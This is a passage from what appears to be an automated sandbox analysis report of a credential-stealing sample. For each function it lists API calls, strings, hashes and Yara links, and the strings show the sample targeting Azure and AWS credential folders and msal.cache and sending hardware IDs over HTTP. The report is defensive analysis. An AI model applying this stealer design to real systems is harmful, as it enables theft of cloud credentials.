                                                                                                                                                                                      • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$f5$msal.cache
                                                                                                                                                                                      • API String ID: 2861501092-3983909078
                                                                                                                                                                                      • Opcode ID: f3306aeb85c6a45d682b05e572bdae66e471d41d35bbdc3adbbdd1b9d98936e7
                                                                                                                                                                                      • Instruction ID: 997d48552d852955a0bde2e5503ae81150d91b25a5341fb4eb4dab682e45ad72
                                                                                                                                                                                      • Opcode Fuzzy Hash: f3306aeb85c6a45d682b05e572bdae66e471d41d35bbdc3adbbdd1b9d98936e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7417472D4011C77CF16FBF0DC4BEDE77ACAB48301F0449A6B615EB091EA71A7888A60
                                                                                                                                                                                      Function 00343F7E Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 445networkstringfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                        • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                        • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00343FF8
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00344010
                                                                                                                                                                                      • InternetConnectA.WININET(00361348,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344151
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 0034418B
                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003441B2
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,00000000,0035E266,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 003443EA
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00344403
                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00344417
                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,00000000), ref: 00344464
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 0034446F
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00344480
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00344489
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                      • String ID: "$------$build_id$f5f5f5$f5f5f5f5f5$hwid
                                                                                                                                                                                      • API String ID: 3006978581-3956332117
                                                                                                                                                                                      • Opcode ID: dd48eb8d515f71cbab1b1f07c61f6a233069363d74f0a2b3018313a0e8b890d3
                                                                                                                                                                                      • Instruction ID: 2d8cc0049c5184fc73bb93cb7b98169e287145d866b1b706c7095b16bdd020f2
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd48eb8d515f71cbab1b1f07c61f6a233069363d74f0a2b3018313a0e8b890d3
                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F17872800109AADB06EBE4DC92DEEB7BCBF25304F554165F512BA091EF34BB49CB54
                                                                                                                                                                                      Function 0034F2FF Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 149memorycomtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 0034F304
                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F319
                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F32A
                                                                                                                                                                                      • CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F344
                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F37A
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0034F3D5
                                                                                                                                                                                        • Part of subcall function 0034F237: _EH_prolog.MSVCRT ref: 0034F23C
                                                                                                                                                                                        • Part of subcall function 0034F237: CoCreateInstance.OLE32(00362790,00000000,00000001,003618C0,?,00361678,00000000,00361ECC), ref: 0034F266
                                                                                                                                                                                        • Part of subcall function 0034F237: SysAllocString.OLEAUT32(?), ref: 0034F273
                                                                                                                                                                                        • Part of subcall function 0034F237: _wtoi64.MSVCRT ref: 0034F2AE
                                                                                                                                                                                        • Part of subcall function 0034F237: SysFreeString.OLEAUT32(?), ref: 0034F2C9
                                                                                                                                                                                        • Part of subcall function 0034F237: SysFreeString.OLEAUT32(00000000), ref: 0034F2D0
                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0034F409
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F415
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034F41C
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0034F45E
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034F448
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                      • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                                                                                                                                                                      • API String ID: 2456697202-271508173
                                                                                                                                                                                      • Opcode ID: 78abbb03d4a10f7b9f58af11c65abc0f28725e9847c594c9ffe95cb79d15ee52
                                                                                                                                                                                      • Instruction ID: cf7bb93e938d2a4b1b3e2cbe5f7e9220d7bd73cb55104746872cff7446b38855
                                                                                                                                                                                      • Opcode Fuzzy Hash: 78abbb03d4a10f7b9f58af11c65abc0f28725e9847c594c9ffe95cb79d15ee52
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D415771A01228BBDB11DB95DC49EEFBFBCEF49B51F048116F505EA2A0D7749A01CBA0
                                                                                                                                                                                      Function 00351F08 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 629sleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00352043
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003520A1
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00351471: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,00351FD9), ref: 003514B2
                                                                                                                                                                                        • Part of subcall function 00351509: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00351565
                                                                                                                                                                                        • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 00351578
                                                                                                                                                                                        • Part of subcall function 00351509: StrStrA.SHLWAPI(00000000,00000000), ref: 0035159F
                                                                                                                                                                                        • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 003515B4
                                                                                                                                                                                        • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 003515CF
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035217B
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003521D9
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003522B3
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00352311
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003523EB
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00352449
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00352523
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035257B
                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 0035258A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                      • String ID: ERROR$_J5$_J5$f5
                                                                                                                                                                                      • API String ID: 507064821-1029286630
                                                                                                                                                                                      • Opcode ID: 84eca16f0badc564255cf835eb710ecdc1046d5dad9ce0dffedf14f91e89961c
                                                                                                                                                                                      • Instruction ID: 3b9db40db854aa59482d3637751e2cd83912507ac45aa1f9aa0b00dbc4fcbf00
                                                                                                                                                                                      • Opcode Fuzzy Hash: 84eca16f0badc564255cf835eb710ecdc1046d5dad9ce0dffedf14f91e89961c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EB22DC71900108AADB16FBB0DD57DEF77BCAF25300F814565B816AE092FE34BB48CA61
                                                                                                                                                                                      Function 00350891 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 299stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 003508BA
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,true,?,?,?,00000104,?,00000104), ref: 00350954
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,00000104,?,00000104,?,?,?,00000104,?,00000104), ref: 00350A02
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00350A3A
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00350A7A
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00350ABA
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00350AFA
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00350C35
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                      • API String ID: 2116072422-2658103896
                                                                                                                                                                                      • Opcode ID: 9cb2ee3a6fc7906ff7e5ac84b1ad10de462d313da0ac8ebb6de88e2e10faa919
                                                                                                                                                                                      • Instruction ID: ae949236248ccb3c1a6d71a59fddc159a4fc4206c8084980d55fb0837d2b1bf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cb2ee3a6fc7906ff7e5ac84b1ad10de462d313da0ac8ebb6de88e2e10faa919
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CB13FB1904209ABDF16EBB4DD45DDE77FCBB08314F144869F509EA061EB31AA49CB50
                                                                                                                                                                                      Function 003545B5 Relevance: 25.6, APIs: 4, Strings: 10, Instructions: 1126networksleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034FDF3: _EH_prolog.MSVCRT ref: 0034FDF8
                                                                                                                                                                                        • Part of subcall function 0034FDF3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0034FE1E
                                                                                                                                                                                        • Part of subcall function 0034FDF3: Process32First.KERNEL32(00000000,00000128), ref: 0034FE2E
                                                                                                                                                                                        • Part of subcall function 0034FDF3: Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
                                                                                                                                                                                        • Part of subcall function 0034FDF3: StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
                                                                                                                                                                                        • Part of subcall function 0034FDF3: CloseHandle.KERNEL32(00000000), ref: 0034FE65
                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0035E266,00000000), ref: 00354A3C
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00354B12
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00354B2F
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034F078: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
                                                                                                                                                                                        • Part of subcall function 0034F078: GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
                                                                                                                                                                                        • Part of subcall function 0034F078: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
                                                                                                                                                                                        • Part of subcall function 0034F078: HeapAlloc.KERNEL32(00000000), ref: 0034F111
                                                                                                                                                                                        • Part of subcall function 00343F7E: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00343FF8
                                                                                                                                                                                        • Part of subcall function 00343F7E: StrCmpCA.SHLWAPI(?), ref: 00344010
                                                                                                                                                                                        • Part of subcall function 00350C58: StrCmpCA.SHLWAPI(00000000,block,?,?,00354B8C), ref: 00350C73
                                                                                                                                                                                        • Part of subcall function 00350C58: ExitProcess.KERNEL32 ref: 00350C7E
                                                                                                                                                                                        • Part of subcall function 00345AE7: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345B61
                                                                                                                                                                                        • Part of subcall function 00345AE7: StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00361ECC), ref: 00345B79
                                                                                                                                                                                        • Part of subcall function 003507C0: strtok_s.MSVCRT ref: 003507E1
                                                                                                                                                                                        • Part of subcall function 003507C0: StrCmpCA.SHLWAPI(00000000,00361B50), ref: 00350812
                                                                                                                                                                                        • Part of subcall function 003507C0: strtok_s.MSVCRT ref: 00350873
                                                                                                                                                                                        • Part of subcall function 00345AE7: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345CBA
                                                                                                                                                                                        • Part of subcall function 00345AE7: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00345CF4
                                                                                                                                                                                        • Part of subcall function 00345AE7: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00345D1B
                                                                                                                                                                                        • Part of subcall function 00350475: strtok_s.MSVCRT ref: 00350496
                                                                                                                                                                                        • Part of subcall function 00350475: strtok_s.MSVCRT ref: 0035051B
                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00354E9F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
